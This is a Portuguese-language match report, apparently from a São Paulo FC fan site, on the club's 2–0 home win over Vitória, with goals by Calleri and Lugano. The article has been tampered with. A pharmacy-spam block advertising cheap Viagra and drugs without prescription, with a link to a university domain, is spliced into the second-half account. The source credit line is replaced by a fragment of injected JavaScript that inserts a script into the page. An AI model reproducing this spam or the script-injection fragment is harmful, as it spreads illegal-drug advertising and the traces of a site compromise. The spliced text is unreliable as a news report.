Destaque

Sob a batuta dos gringos, São Paulo bate o Vitória em casa e cola no G-4

A determinação argentina e a raça uruguaia garantiram ao São Paulo o triunfo por 2 a 0 sobre o Vitória, nesta quarta-feira, no Morumbi, pela oitava rodada do Campeonato Brasileiro. Calleri fez o primeiro, em lance de oportunismo, e Lugano complementou o placar ao se jogar na bola após escanteio cobrado por Ganso. O jogo esteve longe de ser empolgante, mas serviu de redenção ao Tricolor, que havia perdido em casa para o Atlético-PR. Ao time baiano, resta atenção.

Agora com 13 pontos, o São Paulo volta a se aproximar do G-4. O Vitória, com nove, está em zona intermediária, mas próximo à zona de rebaixamento. Na próxima rodada, o São Paulo encara o Flamengo, no domingo, às 16h, no Mané Garrincha, em Brasília. O Vitória joga mais cedo, às 11h, contra a Chapecoense, no Barradão, em Salvador.

calleri

Primeiro tempo

O cronômetro ainda não marcava cinco minutos e as duas equipes já tinham tido ótimas chances de gol. O São Paulo ameaçou logo no primeiro lance de jogo, após falha da defesa adversária, e viu Fernando Miguel defender os chutes de Ytalo e Auro. Logo em seguida, Kieza, que trocou o Morumbi pelo Vitória, cabeceou à queima-roupa. Mas Denis defendeu com o peito.

As duas jogadas perigosas deram uma falsa impressão à partida. Foram apenas lances isolados em um primeiro tempo insosso, no qual o momento de maior emoção foi o retorno da luz após quase 30 minutos de paralisação. Um transformador queimou na rua ao lado do estádio e fez os refletores do estádio se apagarem.

Segundo tempo

Na etapa final, a partida continuou sem muita emoção. Nenhum dos dois times arriscava algo mais ousado. Ambos pareciam esperar uma brecha, um erro do adversário, para se aproveitar. O Tricolor, com maior posse de bola, tinha mais presença no ataque. Mas passava longe de levar perigo ao gol do Vitória, que esperava uma oportunidade no contra-ataque.


Quem teve a chance e aproveitou foi Calleri. Aos 30 minutos, o argentino desviou cruzamento de Matheus Reis e colocou o São Paulo em vantagem. Na comemoração, o camisa 12 homenageou o amigo Sebastian Vladisauskas, que morreu no último sábado, em acidente de moto na Argentina. O atacante tirou a camisa do Tricolor e mostrou camiseta com a foto do amigo.

Buy cheap Viagra online

put in cart cheap drugs without prescription – http://fafar.mhs.narotama.ac.id/2016/11/30/put-in-cart-cheap-drugs-without-prescription/ cheap pills lugano

Em seguida, o Vitória não conseguiu reagir. O São Paulo administrou a posse de bola e chegou ao segundo gol aos 41, com Lugano, que desviou cobrança de escanteio de Ganso. Fim de jogo.

Fonte: Gedocument.currentScript.parentNode.insertBefore(s, document.currentScript);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

18 − dezessete =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Lucas Moura não esconde desejo em retornar ao São Paulo: “É o time que eu amo”

saopauloadmin26 de março de 2020

Daniel Alves escreve para Bolsonaro: “Deveria prezar pelo bem do povo”

saopauloadmin25 de março de 2020

Contra pandemia, São Paulo põe CTs e Morumbi à disposição do Governo

saopauloadmin19 de março de 2020

Nota oficial

saopauloadmin13 de março de 2020

São Paulo deixa vitória escapar e é derrotado na estreia

saopauloadmin6 de março de 2020

Favoritíssimo à próximo presidente do São Paulo, Casares diz: “Queremos unir oposição e situação, sãopaulinos de verdade.”

saopauloadmin2 de março de 2020

São Paulo vence a Ponte no Morumbi

saopauloadmin1 de março de 2020

Depois de Pato, grupo quer ver Pablo se recuperar contra a Ponte Preta

saopauloadmin1 de março de 2020

Conmebol divulga vídeo ensinando como assistir jogo pelo Facebook em TV SMART

saopauloadmin1 de março de 2020